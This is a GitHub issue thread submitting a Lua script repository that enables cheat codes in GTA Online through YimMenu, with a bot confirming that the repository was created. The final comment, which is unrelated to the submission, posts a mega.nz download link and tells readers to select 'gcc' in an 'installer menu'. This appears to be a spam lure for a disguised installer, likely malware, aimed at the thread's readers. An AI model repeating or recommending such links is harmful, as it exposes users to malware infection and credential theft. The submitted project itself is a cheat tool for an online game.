### ISSUE TITLE
[Submission]: CheatCodes

### ISSUE THREAD

**Issue by ShinyWasabi** [YimMenu-Lua/submission#68]
### Repository Name

CheatCodes

### Description

Enables cheat codes in GTA Online.

### ToS Agreement

- [X] I agree to the Github ToS

### External Linking

- [X] I agree not to link externally

### No Advertising

- [X] I agree not to advertise for commercial gain

### Paywalling

- [X] I agree not to paywall features

**Comment by YimNPC** [comment]
Success, your repository has been created!

You can accept the invite by checking your email or clicking [here](https://github.com/YimMenu-Lua/CheatCodes/invitations).

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
